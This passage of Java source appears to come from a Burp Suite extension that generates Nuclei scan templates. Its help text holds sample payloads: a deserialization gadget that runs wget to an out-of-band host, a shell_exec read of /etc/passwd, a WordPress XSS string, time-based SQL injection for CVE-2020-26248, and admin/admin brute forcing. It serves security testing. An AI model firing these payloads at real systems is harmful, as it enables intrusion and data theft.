JComboBox Nuc_Tab_headers = new JComboBox(GetHeadersModes()); 97 | Nuc_Tab_headers.setMaximumSize(Nuc_Tab_headers.getPreferredSize()); 98 | Nuc_Tab_headers.setSelectedIndex(0); 99 | 100 | JLabel Nuc_lb_body = new JLabel("body:", SwingConstants.RIGHT); 101 | JComboBox Nuc_Tab_body = new JComboBox(GetBodyModes()); 102 | Nuc_Tab_body.setMaximumSize(Nuc_Tab_headers.getPreferredSize()); 103 | Nuc_Tab_body.setSelectedIndex(0); 104 | 105 | JLabel Nuc_lb_redirects = new JLabel("是否跟随跳转:", SwingConstants.RIGHT); 106 | JComboBox Nuc_Tab_redirects = new JComboBox(GetRedirectsModes()); 107 | Nuc_Tab_redirects.setMaximumSize(Nuc_Tab_redirects.getPreferredSize()); 108 | Nuc_Tab_redirects.setSelectedIndex(0); 109 | 110 | JLabel Nuc_lb_redirects_num = new JLabel("跳转次数:", SwingConstants.RIGHT); 111 | JTextField Nuc_tf_redirects_num = new JTextField(1); 112 | Nuc_tf_redirects_num.setText("2"); 113 | 114 | JLabel Nuc_lb_Match_word = new JLabel("matchers模版 ", SwingConstants.RIGHT); 115 | JCheckBox Nuc_CB_Match_word = new JCheckBox(" (word)"); 116 | Nuc_CB_Match_word.addActionListener(e -> { 117 | if (Nuc_CB_Match_word.isSelected()) { 118 | match_word = true; 119 | match_true = true; 120 | } else { 121 | match_word = false; 122 | } 123 | }); 124 | 125 | JLabel Nuc_lb_Match_header = new JLabel("matchers模版 ", SwingConstants.RIGHT); 126 | JCheckBox Nuc_CB_Match_header = new JCheckBox(" (header)"); 127 | Nuc_CB_Match_header.addActionListener(e -> { 128 | if (Nuc_CB_Match_header.isSelected()) { 129 | match_header = true; 130 | match_true = true; 131 | } else { 132 | match_header = false; 133 | } 134 | }); 135 | 136 | JLabel Nuc_lb_Match_status = new JLabel("matchers模版", SwingConstants.RIGHT); 137 | JCheckBox Nuc_CB_Match_status = new JCheckBox(" (status)"); 138 | Nuc_CB_Match_status.addActionListener(e -> { 139 | if (Nuc_CB_Match_status.isSelected()) { 140 | match_status = true; 141 | match_true = true; 142 | } else { 143 | match_status = false; 144 | } 145 | }); 146 | 147 | JLabel 
Nuc_lb_Match_extractors = new JLabel("matchers模版 ", SwingConstants.RIGHT); 148 | JCheckBox Nuc_CB_Match_extractors = new JCheckBox(" (extractors)"); 149 | Nuc_CB_Match_extractors.addActionListener(e -> { 150 | if (Nuc_CB_Match_extractors.isSelected()) { 151 | extractors = true; 152 | } else { 153 | extractors = false; 154 | } 155 | }); 156 | 157 | JLabel Nuc_lb_Match_negative = new JLabel("matchers模版 ", SwingConstants.RIGHT); 158 | JCheckBox Nuc_CB_Match_negative = new JCheckBox(" (negative)"); 159 | Nuc_CB_Match_negative.addActionListener(e -> { 160 | if (Nuc_CB_Match_negative.isSelected()) { 161 | match_negative = true; 162 | match_true = true; 163 | } else { 164 | match_negative = false; 165 | } 166 | }); 167 | 168 | JLabel Nuc_lb_Match_time = new JLabel("matchers模版 ", SwingConstants.RIGHT); 169 | JCheckBox Nuc_CB_Match_time = new JCheckBox(" (time)"); 170 | Nuc_CB_Match_time.addActionListener(e -> { 171 | if (Nuc_CB_Match_time.isSelected()) { 172 | match_time = true; 173 | match_true = true; 174 | } else { 175 | match_time = false; 176 | } 177 | }); 178 | 179 | JLabel Nuc_lb_Match_size = new JLabel("matchers模版 ", SwingConstants.RIGHT); 180 | JCheckBox Nuc_CB_Match_size = new JCheckBox(" (size)"); 181 | Nuc_CB_Match_size.addActionListener(e -> { 182 | if (Nuc_CB_Match_size.isSelected()) { 183 | match_size = true; 184 | match_true = true; 185 | } else { 186 | match_size = false; 187 | } 188 | }); 189 | 190 | JLabel Nuc_lb_Match_interactsh_protocol = new JLabel("matchers模版 ", SwingConstants.RIGHT); 191 | JCheckBox Nuc_CB_Match_interactsh_protocol = new JCheckBox(" (interactsh_protocol)"); 192 | Nuc_CB_Match_interactsh_protocol.addActionListener(e -> { 193 | if (Nuc_CB_Match_interactsh_protocol.isSelected()) { 194 | match_interactsh_protocol = true; 195 | match_true = true; 196 | } else { 197 | match_interactsh_protocol = false; 198 | } 199 | }); 200 | 201 | JLabel Nuc_lb_Match_interactsh_request = new JLabel("matchers模版 ", SwingConstants.RIGHT); 202 | JCheckBox 
Nuc_CB_Match_interactsh_request = new JCheckBox(" (interactsh_request)"); 203 | Nuc_CB_Match_interactsh_request.addActionListener(e -> { 204 | if (Nuc_CB_Match_interactsh_request.isSelected()) { 205 | match_interactsh_request = true; 206 | match_true = true; 207 | } else { 208 | match_interactsh_request = false; 209 | } 210 | }); 211 | 212 | JLabel Nuc_lb_Match_regex = new JLabel("matchers模版 ", SwingConstants.RIGHT); 213 | JCheckBox Nuc_CB_Match_regex = new JCheckBox(" (regex)"); 214 | Nuc_CB_Match_regex.addActionListener(e -> { 215 | if (Nuc_CB_Match_regex.isSelected()) { 216 | match_regex = true; 217 | match_true = true; 218 | } else { 219 | match_regex = false; 220 | } 221 | }); 222 | 223 | JLabel Nuc_lb_Match_binary = new JLabel("matchers模版 ", SwingConstants.RIGHT); 224 | JCheckBox Nuc_CB_Match_binary = new JCheckBox(" (binary)"); 225 | Nuc_CB_Match_binary.addActionListener(e -> { 226 | if (Nuc_CB_Match_binary.isSelected()) { 227 | match_binary = true; 228 | match_true = true; 229 | } else { 230 | match_binary = false; 231 | } 232 | }); 233 | 234 | Nuc_jp1.add(Nuc_bt_1); 235 | Nuc_jp1.add(Nuc_bt_2); 236 | Nuc_jp1.add(Nuc_lb_id); 237 | Nuc_jp1.add(Nuc_tf_id); 238 | Nuc_jp1.add(Nuc_lb_name); 239 | Nuc_jp1.add(Nuc_tf_name); 240 | Nuc_jp1.add(Nuc_lb_author); 241 | Nuc_jp1.add(Nuc_tf_author); 242 | Nuc_jp1.add(Nuc_lb_severity); 243 | Nuc_jp1.add(Nuc_Tab_severity); 244 | Nuc_jp1.add(Nuc_lb_description); 245 | Nuc_jp1.add(Nuc_tf_description); 246 | Nuc_jp1.add(Nuc_lb_tags); 247 | Nuc_jp1.add(Nuc_tf_tags); 248 | Nuc_jp1.add(Nuc_lb_req); 249 | Nuc_jp1.add(Nuc_Tab_req); 250 | Nuc_jp1.add(Nuc_lb_path); 251 | Nuc_jp1.add(Nuc_tf_path); 252 | Nuc_jp1.add(Nuc_lb_headers); 253 | Nuc_jp1.add(Nuc_Tab_headers); 254 | Nuc_jp1.add(Nuc_lb_body); 255 | Nuc_jp1.add(Nuc_Tab_body); 256 | Nuc_jp1.add(Nuc_lb_redirects); 257 | Nuc_jp1.add(Nuc_Tab_redirects); 258 | Nuc_jp1.add(Nuc_lb_redirects_num); 259 | Nuc_jp1.add(Nuc_tf_redirects_num); 260 | 261 | JPanel Nuc_jp4 = new JPanel(); 262 | 
Nuc_jp4.setLayout(new GridLayout(14, 2)); 263 | 264 | Nuc_jp4.add(Nuc_lb_Match_word); 265 | Nuc_jp4.add(Nuc_CB_Match_word); 266 | Nuc_jp4.add(Nuc_lb_Match_header); 267 | Nuc_jp4.add(Nuc_CB_Match_header); 268 | Nuc_jp4.add(Nuc_lb_Match_status); 269 | Nuc_jp4.add(Nuc_CB_Match_status); 270 | Nuc_jp4.add(Nuc_lb_Match_extractors); 271 | Nuc_jp4.add(Nuc_CB_Match_extractors); 272 | Nuc_jp4.add(Nuc_lb_Match_negative); 273 | Nuc_jp4.add(Nuc_CB_Match_negative); 274 | Nuc_jp4.add(Nuc_lb_Match_time); 275 | Nuc_jp4.add(Nuc_CB_Match_time); 276 | Nuc_jp4.add(Nuc_lb_Match_size); 277 | Nuc_jp4.add(Nuc_CB_Match_size); 278 | Nuc_jp4.add(Nuc_lb_Match_interactsh_protocol); 279 | Nuc_jp4.add(Nuc_CB_Match_interactsh_protocol); 280 | Nuc_jp4.add(Nuc_lb_Match_interactsh_request); 281 | Nuc_jp4.add(Nuc_CB_Match_interactsh_request); 282 | Nuc_jp4.add(Nuc_lb_Match_regex); 283 | Nuc_jp4.add(Nuc_CB_Match_regex); 284 | Nuc_jp4.add(Nuc_lb_Match_binary); 285 | Nuc_jp4.add(Nuc_CB_Match_binary); 286 | 287 | JPanel Nuc_jp2 = new JPanel(); 288 | Nuc_jp2.setLayout(new GridLayout(1, 1)); 289 | 290 | JTextArea Nuc_ta_2 = new JTextArea(); 291 | Nuc_ta_2.setText(""); 292 | Nuc_ta_2.setRows(30); 293 | Nuc_ta_2.setColumns(30); 294 | Nuc_ta_2.setLineWrap(true);//自动换行 295 | Nuc_ta_2.setEditable(true);//可编辑 296 | JScrollPane Nuc_sp_2 = new JScrollPane(Nuc_ta_2); 297 | 298 | Nuc_jp2.add(Nuc_sp_2); 299 | 300 | JPanel Nuc_jp3 = new JPanel(); 301 | Nuc_jp3.setLayout(new GridLayout(1, 1)); 302 | 303 | String Help_data1 = "官方文档:https://docs.projectdiscovery.io/templates/introduction\n" + 304 | "\n" + 305 | "nuclei 2.9.1 版本更新了模板格式。如果使用的是较旧的 nuclei 版本,可能无法解析新的模板格式。\n" + 306 | "建议将 nuclei 版本升级至 2.9.1 或更高版本以确保正确解析模板格式。\n" + 307 | "\n" + 308 | " ===========================示例模板===========================\n" + 309 | "id: template-id\n" + 310 | "\n" + 311 | "info:\n" + 312 | " name: Template Name\n" + 313 | " author: test\n" + 314 | " severity: info\n" + 315 | " description: 漏洞详情描述\n" + 316 | " reference:\n" + 317 | " - 
https://Template.nuclei.sh\n" + 318 | " # 元数据节点,与 uncover 集成的格式如下:-query: ''\n" + 319 | " metadata:\n" + 320 | " max-request: 2\n" + 321 | " fofa-query: 'body=\"公司\"'\n" + 322 | " shodan-query: 'vuln:CVE-2021-26855'\n" + 323 | " hunter-query: 'web.body=\"公司\"'\n" + 324 | " tags: tags\n" + 325 | "\n" + 326 | "# 自定义模版变量,自2.6.9版本开始支持\n" + 327 | "variables:\n" + 328 | " first_1: \"{{rand_int(8, 20)}}\"\n" + 329 | " first_2: \"{{rand_int(100, 101)}}\"\n" + 330 | "\n" + 331 | "http:\n" + 332 | " # 解析 raw 格式请求\n" + 333 | " - raw:\n" + 334 | " - |-\n" + 335 | " POST /{{Path}} HTTP/1.1\n" + 336 | " Host: {{Hostname}}\n" + 337 | " Content-Type: application/json\n" + 338 | " \n" + 339 | " {\"username\":{{username}},\"password\":{{password}}}\n" + 340 | "\n" + 341 | " attack: clusterbomb # 定义HTTP模糊攻击类型,可用类型: batteringram,pitchfork,clusterbomb\n" + 342 | " payloads:\n" + 343 | " username:\n" + 344 | " - 'admin'\n" + 345 | " password:\n" + 346 | " - 'admin'\n" + 347 | " # header: helpers/wordlists/header.txt\n" + 348 | " Path: \n" + 349 | " - 'api/selectContentManagePage'\n" + 350 | " \n" + 351 | " matchers-condition: and\n" + 352 | " matchers:\n" + 353 | " - type: dsl\n" + 354 | " dsl:\n" + 355 | " - \"contains(body, 'pageSize')\"\n" + 356 | " - \"contains(body_1, 'pageSize') && contains(body_2, 'pageNum')\"\n" + 357 | " - \"contains_all(body_1, 'pageSize', 'pageNum')\" #单个body包内指定多个匹配关键字\n" + 358 | " - \"contains(header, 'application/json')\"\n" + 359 | " - \"status_code == 200\"\n" + 360 | " - \"status_code_1 == 404 && status_code_2 == 200\"\n" + 361 | "\n" + 362 | " # 检查Cookie的MD5校验和是否包含在大写的请求体中\n" + 363 | " - \"contains(toupper(body), md5(cookie))\"\n" + 364 | " condition: and\n" + 365 | "\n" + 366 | " - type: dsl\n" + 367 | " dsl:\n" + 368 | " # 检测相应包的长度\n" + 369 | " - \"len(body_1) != 0\"\n" + 370 | " # 基于DSL的持续时间匹配器,当响应时间与定义的持续时间匹配时返回true,示例为大于等于6秒\n" + 371 | " - 'duration>=6'\n" + 372 | " condition: and\n" + 373 | "\n" + 374 | " # 匹配变量\n" + 375 | " - type: word\n" + 376 
| " part: body\n" + 377 | " words:\n" + 378 | " - \"{{first_2}}\"\n" + 379 | "\n" + 380 | " # Interactsh匹配器,需要和使用 {{interactsh_response}}\n" + 381 | " # 可匹配 interactsh_protocol、interactsh_request和 interactsh_response 三处\n" + 382 | "\n" + 383 | " # 确认HTTP交互\n" + 384 | " - type: word\n" + 385 | " part: interactsh_protocol \n" + 386 | " words:\n" + 387 | " - \"http\"\n" + 388 | "\n" + 389 | " # 确认检索/etc/passwd文件\n" + 390 | " - type: regex\n" + 391 | " part: interactsh_request \n" + 392 | " regex:\n" + 393 | " - \"root:[x*]:0:0:\"\n" + 394 | "\n" + 395 | " # 确认DNS交互\n" + 396 | " - type: word\n" + 397 | " part: interactsh_response \n" + 398 | " words:\n" + 399 | " - \"dns\"\n" + 400 | "\n" + 401 | " # 二进制流匹配\n" + 402 | " - type: binary\n" + 403 | " binary:\n" + 404 | " - \"504B0304\" # zip archive\n" + 405 | " - \"526172211A070100\" # RAR archive version 5.0\n" + 406 | " - \"FD377A585A0000\" # xz tar.xz archive\n" + 407 | " condition: or # 指定单个匹配器内多个条件的与或关系\n" + 408 | " part: body\n" + 409 | "\n" + 410 | " - type: word\n" + 411 | " encoding: hex\n" + 412 | " words:\n" + 413 | " - \"50494e47\"\n" + 414 | " part: body\n" + 415 | "\n" + 416 | " # 否定匹配器,对匹配器结果进行取反\n" + 417 | " - type: word\n" + 418 | " words:\n" + 419 | " - \"PHPSESSID\"\n" + 420 | " part: header\n" + 421 | " negative: true\n" + 422 | "\n" + 423 | " extractors:\n" + 424 | " - type: regex\n" + 425 | " # 为提取的信息命名,方便调用,可省略\n" + 426 | " name: api\n" + 427 | " part: body\n" + 428 | " # 避免在终端中打印提取的值,使用动态变量时必须添加此标志\n" + 429 | " internal: true\n" + 430 | " regex:\n" + 431 | " - \"(?m)[0-9]{3,10}\\.[0-9]+\"\n" + 432 | "\n" + 433 | " ----------------------------分割线----------------------------\n" + 434 | "# 嵌套表达式\n" + 435 | "❌ {{url_decode({{base64_decode('SGVsbG8=')}})}}\n" + 436 | "✔ {{url_decode(base64_decode('SGVsbG8='))}}\n" + 437 | "\n" + 438 | "# 如果需要在 extractor 中使用,比如将 extractor 提取的变量值 test 进行处理\n" + 439 | "{{url_decode(base64_decode('{{test}}'))}}\n" + 440 | "\n" + 441 | " 
----------------------------分割线----------------------------\n" + 442 | "# 自 Nuclei v2.3.6 发行以来,Nuclei 支持使用 interact.sh API 内置自动请求关联来实现基于 OOB 的漏洞扫描\n" + 443 | "http:\n" + 444 | " - raw:\n" + 445 | " - |\n" + 446 | " GET /plugins/servlet/oauth/users/icon-uri?consumerUri={{interactsh-url}} HTTP/1.1\n" + 447 | " Host: {{Hostname}}\n" + 448 | "\n" + 449 | " ----------------------------分割线----------------------------\n" + 450 | " # JAVA反序列化: https://docs.nuclei.sh/template-guide/helper-functions#deserialization-helper-functions\n" + 451 | "http:\n" + 452 | " - raw:\n" + 453 | " - |\n" + 454 | " POST /index.faces;jsessionid=x HTTP/1.1\n" + 455 | " Host: {{Hostname}}\n" + 456 | " Content-Type: application/x-www-form-urlencoded\n" + 457 | "\n" + 458 | " javax.faces.ViewState={{generate_java_gadget(\"commons-collections3.1\", \"wget http://{{interactsh-url}}\", \"base64\")}}\n" + 459 | "\n" + 460 | " ----------------------------分割线----------------------------\n" + 461 | " # 发送一个GET请求\n" + 462 | "http:\n" + 463 | " - method: GET\n" + 464 | " path:\n" + 465 | " - \"{{BaseURL}}/actuator/env\"\n" + 466 | " - \"{{BaseURL}}/login\"\n" + 467 | " - \"{{BaseURL}}/thumbs.db\"\n" + 468 | " - \"{{BaseURL}}/.svn/wc.db\"\n" + 469 | " # 发送一些头部信息给服务器的示例\n" + 470 | " headers:\n" + 471 | " X-Client-IP: 127.0.0.1\n" + 472 | " X-Remote-IP: 127.0.0.1\n" + 473 | " X-Remote-Addr: 127.0.0.1\n" + 474 | " X-Forwarded-For: 127.0.0.1\n" + 475 | " X-Originating-IP: 127.0.0.1\n" + 476 | " Cookie: \"CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl\"\n" + 477 | "\n" + 478 | " # skip-variables-check 可以使 nuclei 不要解析请求内容中 `{{` 为变量\n" + 479 | " skip-variables-check: true\n" + 480 | "\n" + 481 | " # 如果模板中包含多个扫描路径,当第一个路径匹配成功时,会自动停止后续路径的扫描,这不会影响其他模板\n" + 482 | " stop-at-first-match: true\n" + 483 | "\n" + 484 | " # 单位 bytes- 从服务器响应中读取的最大值\n" + 485 | " max-size: 500\n" + 486 | "\n" + 487 | " ----------------------------分割线----------------------------\n" + 488 | "id: 
wp-related-post-xss\n" + 489 | "\n" + 490 | "http:\n" + 491 | " # 发送一个POST请求\n" + 492 | " - method: POST\n" + 493 | " path: \n" + 494 | " - '{{RootURL}}/wp-login.php'\n" + 495 | " headers:\n" + 496 | " Content-Type: application/x-www-form-urlencoded\n" + 497 | " body: 'log={{username}}&pwd={{password}}&wp-submit=Log+In'\n" + 498 | "\n" + 499 | " - method: GET\n" + 500 | " path:\n" + 501 | " - '{{RootURL}}/wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3Ep'\n" + 502 | "\n" + 503 | " # cookie-reuse 参数为 true,在多个请求之间维护基于 cookie 的会话,该参数接受布尔类型的输入,默认值为 false。\n" + 504 | " cookie-reuse: true\n" + 505 | "\n" + 506 | " # 请求条件与匹配器中的DSL表达式一起使用。它们允许逻辑表达式包含跨多个请求/响应的条件。\n" + 507 | " # 在模板中添加 \"req-condition: true\" 选项。响应的属性可以使用 \"<请求编号>\" 后缀来引用特定的响应,例如 status_code_1、status_code_3 或 body_2。\n" + 508 | " req-condition: true\n" + 509 | "\n" + 510 | " matchers-condition: and\n" + 511 | " matchers:\n" + 512 | " - type: dsl\n" + 513 | " dsl:\n" + 514 | " - \"contains(header, 'text/html')\"\n" + 515 | " - \"contains(body_1, '&action=edit') && contains(body_2, 'All Posts')\"\n" + 516 | " - \"status_code == 200\"\n" + 517 | " condition: and\n" + 518 | "\n" + 519 | " ----------------------------分割线----------------------------\n" + 520 | " # @timeout 请求注解\n" + 521 | "id: PrestaShop_Product_Comments_SQL_Injection_CVE-2020-26248\n" + 522 | "\n" + 523 | "http:\n" + 524 | " - raw:\n" + 525 | " - |\n" + 526 | " # @timeout 是请求注解的一种,⽤于覆盖默认的请求超时时间\n" + 527 | " @timeout: 20s\n" + 528 | " GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\n" + 529 | " Host: {{Hostname}}\n" + 530 | "\n" + 531 | " matchers:\n" + 532 | " - type: dsl\n" + 533 | " dsl:\n" + 534 | " - 'duration>=6 && status_code == 200'\n" + 535 | " - 'contains(content_type, \"application/json\") && contains(body, \"average_grade\")'\n" + 536 | " condition: and\n" + 537 | "\n" + 538 | " 
----------------------------分割线----------------------------\n" + 539 | " # \"self-contained\"通常在批量检测API可用性时使用\n" + 540 | " # 假设你通过信息泄露获得了一个API密钥,但不知道这个密钥属于哪个服务,也没有其他特征可供参考。这时,你只能逐个尝试各个官方API接口,看哪个平台能够成功验证该密钥。\n" + 541 | "id: example-self-contained-input\n" + 542 | "\n" + 543 | "self-contained: true\n" + 544 | "http:\n" + 545 | " - raw:\n" + 546 | " - |\n" + 547 | " GET https://example.com:443/gg HTTP/1.1\n" + 548 | " Host: example.com:443\n"; 549 | 550 | 551 | JTextArea Nuc_ta_3 = new JTextArea(); 552 | Nuc_ta_3.setText(Help_data1); 553 | Nuc_ta_3.setRows(30); 554 | Nuc_ta_3.setColumns(30); 555 | Nuc_ta_3.setLineWrap(true);//自动换行 556 | Nuc_ta_3.setEditable(true);//可编辑 557 | JScrollPane Nuc_sp_3 = new JScrollPane(Nuc_ta_3); 558 | 559 | String Help_data2 = "官方文档:https://docs.projectdiscovery.io/templates/reference/helper-functions\n" + 560 | "\n" + 561 | " ----------------------------分割线----------------------------\n" + 562 | " # https://example.com:443/foo/bar.php\n" + 563 | "\n" + 564 | "{{BaseURL}} # https://example.com:443/foo/bar.php\n" + 565 | "{{RootURL}} # https://example.com:443\n" + 566 | "{{Hostname}} # example.com:443\n" + 567 | "{{Host}} # example.com\n" + 568 | "{{Port}} # 443\n" + 569 | "{{Path}} # /foo\n" + 570 | "{{File}} # bar.php\n" + 571 | "{{Scheme}} # https\n" + 572 | "\n" + 573 | " ----------------------------分割线----------------------------\n" + 574 | " # 重点配置参数备忘:\n" + 575 | "\n" + 576 | " # skip-variables-check 可以使 nuclei 不要解析请求内容中 `{{` 为变量\n" + 577 | " skip-variables-check: true\n" + 578 | "\n" + 579 | " # 如果模板中包含多个扫描路径,当第一个路径匹配成功时,会自动停止后续路径的扫描,这不会影响其他模板\n" + 580 | " stop-at-first-match: true\n" + 581 | "\n" + 582 | " # 单位 bytes- 从服务器响应中读取的最大值\n" + 583 | " max-size: 500\n" + 584 | "\n" + 585 | " # cookie-reuse 参数为 true,在多个请求之间维护基于 cookie 的会话,该参数接受布尔类型的输入,默认值为 false。\n" + 586 | " cookie-reuse: true\n" + 587 | "\n" + 588 | " # req-condition 与 DSL表达式匹配器一起使用,它允许逻辑表达式包含跨多个请求/响应的条件\n" + 589 | " # 在模板中添加 \"req-condition: true\" 选项,响应的属性可以使用 
\"<请求编号>\" 后缀来引用特定的响应,例如 status_code_1、status_code_3 或 body_2\n" + 590 | " req-condition: true\n" + 591 | "\n" + 592 | " redirects: true # 启用重定向\n" + 593 | " max- redirects: 3 # 允许重定向的次数,默认值为 10\n" + 594 | "\n" + 595 | " ----------------------------分割线----------------------------\n" + 596 | " # 模板签名:\n" + 597 | "\n" + 598 | " # 从v3.0.0开始支持签名,未签名的模板默认会被禁用\n" + 599 | " # 批量对模板进行签名\n" + 600 | " nuclei -lfa -duc -sign -t /home/nuclei-templates\n" + 601 | "\n" + 602 | " ----------------------------分割线----------------------------\n" + 603 | " # 返回输入的长度\n" + 604 | "\n" + 605 | "{{len(\"Hello\")}}\n" + 606 | "{{len(5555)}}\n" + 607 | "\n" + 608 | " ----------------------------分割线----------------------------\n" + 609 | " # 随机字段\n" + 610 | "\n" + 611 | "{{randstr}}\n" + 612 | "{{rand_int(10)}}\n" + 613 | "\n" + 614 | " ----------------------------分割线----------------------------\n" + 615 | " # 大小写转换\n" + 616 | "\n" + 617 | "{{to_lower(\"HELLO\")}} #将输入转换为小写字符\n" + 618 | "{{to_upper(\"hello\")}} #将输入转换为大写字符\n" + 619 | "\n" + 620 | " ----------------------------分割线----------------------------\n" + 621 | " # 编码转换\n" + 622 | "\n" + 623 | "{{url_decode(\"https:%2F%2Fprojectdiscovery.io%3Ftest=1\")}} #对输入字符串进行URL解码\n" + 624 | "{{url_encode(\"https://projectdiscovery.io/test?a=1\")}} #对输入字符串进行URL编码\n" + 625 | "\n" + 626 | "{{hex_decode(\"6161\")}}\n" + 627 | "{{hex_encode(\"aa\")}}\n" + 628 | "\n" + 629 | "{{sha1(\"Hello\")}}\n" + 630 | "{{sha256(\"Hello\")}}\n" + 631 | "\n" + 632 | "{{base64(\"Hello\")}}\n" + 633 | "{{base64(1234)}}\n" + 634 | "{{base64_decode(\"SGVsbG8=\")}}\n" + 635 | "{{base64_py(\"Hello\")}} #像Python一样将字符串编码为Base64(包含换行符)\n" + 636 | "\n" + 637 | "{{md5(\"Hello\")}}\n" + 638 | "{{md5(1234)}}\n" + 639 | "\n" + 640 | " ----------------------------分割线----------------------------\n" + 641 | "{{rand_base(5)}}\n" + 642 | "{{rand_base(5, \"abc\")}}\n" + 643 | "{{rand_char(\"abc\")}}\n" + 644 | "{{rand_char()}}\n" + 645 | "{{rand_int()}}\n" + 646 | "{{rand_int(1, 
10)}}\n" + 647 | "{{rand_text_alpha(10)}}\n" + 648 | "{{rand_text_alpha(10, \"abc\")}}\n" + 649 | "{{rand_text_alphanumeric(10)}}\n" + 650 | "{{rand_text_alphanumeric(10, \"ab12\")}}\n" + 651 | "{{rand_text_numeric(10)}}\n" + 652 | "{{rand_text_numeric(10, 123)}}\n" + 653 | "\n" + 654 | " ----------------------------分割线----------------------------\n" + 655 | " # 验证字符串是否包含子字符串\n" + 656 | "{{contains(\"Hello\", \"lo\")}}\n" + 657 | "\n" + 658 | " ----------------------------分割线----------------------------\n" + 659 | " \n" + 660 | "{{generate_java_gadget(\"commons-collections3.1\", \"wget {{interactsh-url}}\", \"base64\")}}\n" + 661 | "{{gzip(\"Hello\")}}\n" + 662 | "{{html_escape(\"test\")}}\n" + 663 | "{{html_unescape(\"<body>test</body>\")}}\n" + 664 | "{{mmh3(\"Hello\")}}\n" + 665 | "{{print_debug(1+2, \"Hello\")}}\n" + 666 | "{{regex(\"H([a-z]+)o\", \"Hello\")}}\n" + 667 | "{{remove_bad_chars(\"abcd\", \"bc\")}}\n" + 668 | "{{repeat(\"../\", 5)}}\n" + 669 | "{{replace(\"Hello\", \"He\", \"Ha\")}}\n" + 670 | "{{replace_regex(\"He123llo\", \"(\\d+)\", \"\")}}\n" + 671 | "{{reverse(\"abc\")}}\n" + 672 | "{{trim(\"aaaHelloddd\", \"ad\")}}\n" + 673 | "{{trim_left(\"aaaHelloddd\", \"ad\")}}\n" + 674 | "{{trim_prefix(\"aaHelloaa\", \"aa\")}}\n" + 675 | "{{trim_right(\"aaaHelloddd\", \"ad\")}}\n" + 676 | "{{trim_space(\" Hello \")}}\n" + 677 | "{{trim_suffix(\"aaHelloaa\", \"aa\")}}\n" + 678 | "{{unix_time(10)}}\n" + 679 | "{{wait_for(1)}}\n" + 680 | "\n" + 681 | " ----------------------------分割线----------------------------\n" + 682 | " # www.projectdiscovery.io\n" + 683 | "\n" + 684 | "{{FQDN}} # www.projectdiscovery.io\n" + 685 | "{{RDN}} # projectdiscovery.io\n" + 686 | "{{DN}} # projectdiscovery\n" + 687 | "{{SD}} # www\n" + 688 | "{{TLD}} # io\n"; 689 | 690 | 691 | JTextArea Nuc_ta_4 = new JTextArea(); 692 | Nuc_ta_4.setText(Help_data2); 693 | Nuc_ta_4.setRows(30); 694 | Nuc_ta_4.setColumns(30); 695 | Nuc_ta_4.setLineWrap(true);//自动换行 696 | 
Nuc_ta_4.setEditable(true);//可编辑 697 | JScrollPane Nuc_sp_4 = new JScrollPane(Nuc_ta_4); 698 | 699 | Nuc_jp3.add(Nuc_sp_3); 700 | Nuc_jp3.add(Nuc_sp_4); 701 | 702 | //生成按钮 703 | Nuc_bt_1.addActionListener(new ActionListener() { 704 | @Override 705 | public void actionPerformed(ActionEvent e) { 706 | Nuc_ta_2.setText(Yaml_Gen(Nuc_tf_id.getText(), Nuc_tf_name.getText(), Nuc_tf_author.getText(), Nuc_tf_description.getText(), Nuc_tf_tags.getText(), Nuc_Tab_redirects.getSelectedItem().toString(), Nuc_tf_redirects_num.getText(), Nuc_Tab_req.getSelectedItem().toString(), Nuc_tf_path.getText(), Nuc_Tab_headers.getSelectedItem().toString(), Nuc_Tab_body.getSelectedItem().toString(), Nuc_Tab_severity.getSelectedItem().toString())); 707 | } 708 | }); 709 | //清空按钮 710 | Nuc_bt_2.addActionListener(new ActionListener() { 711 | @Override 712 | public void actionPerformed(ActionEvent e) { 713 | Nuc_ta_2.setText(""); 714 | } 715 | }); 716 | 717 | //主界面 718 | tabs = new JTabbedPane(); 719 | 720 | //tabs.addTab("Template生成",Nu_Te_Pane); 721 | // 信息生成界面 整体分布 722 | // Nu_Te_Pane.setLeftComponent(Nuc_jp1); 723 | // Nu_Te_Pane.setRightComponent(Nuc_jp2); 724 | // Nu_Te_Pane.setDividerLocation(400); 725 | 726 | JSplitPane Nu_Te_Pane2 = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT); 727 | tabs.addTab("Template生成", Nu_Te_Pane2); 728 | 729 | JSplitPane splitPanes = new JSplitPane(JSplitPane.VERTICAL_SPLIT); 730 | splitPanes.setTopComponent(Nuc_jp1); 731 | splitPanes.setBottomComponent(Nuc_jp4); 732 | splitPanes.setDividerLocation(450); 733 | 734 | JSplitPane splitPanes_2 = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT); 735 | splitPanes_2.setLeftComponent(Nuc_jp2); 736 | splitPanes_2.setRightComponent(Nuc_jp3); 737 | splitPanes_2.setDividerLocation(430); 738 | 739 | Nu_Te_Pane2.setLeftComponent(splitPanes); 740 | Nu_Te_Pane2.setRightComponent(splitPanes_2); 741 | Nu_Te_Pane2.setDividerLocation(380); 742 | 743 | // customize our UI components 744 | callbacks.customizeUiComponent(tabs); 745 | 746 | 
// add the custom tab to Burp's UI 747 | callbacks.addSuiteTab(BurpExtender.this); 748 | 749 | // register ourselves as an HTTP listener 750 | callbacks.registerHttpListener(BurpExtender.this); 751 | 752 | } 753 | 754 | private String[] GetReqModes() { 755 | ArrayList algStrs = new ArrayList(); 756 | Config.reqMode[] backends = Config.reqMode.values(); 757 | for (Config.reqMode backend : backends) { 758 | algStrs.add(backend.name().replace('_', '/')); 759 | } 760 | return algStrs.toArray(new String[algStrs.size()]); 761 | } 762 | 763 | private String[] GetSeverityModes() { 764 | ArrayList algStrs = new ArrayList(); 765 | Config.severityMode[] backends = Config.severityMode.values(); 766 | for (Config.severityMode backend : backends) { 767 | algStrs.add(backend.name().replace('_', '/')); 768 | } 769 | return algStrs.toArray(new String[algStrs.size()]); 770 | } 771 | 772 | private String[] GetBodyModes() { 773 | ArrayList algStrs = new ArrayList(); 774 | Config.ContentBodyMode[] backends = Config.ContentBodyMode.values(); 775 | for (Config.ContentBodyMode backend : backends) { 776 | algStrs.add(backend.name().replace('_', '/')); 777 | } 778 | return algStrs.toArray(new String[algStrs.size()]); 779 | } 780 | 781 | private String[] GetHeadersModes() { 782 | ArrayList 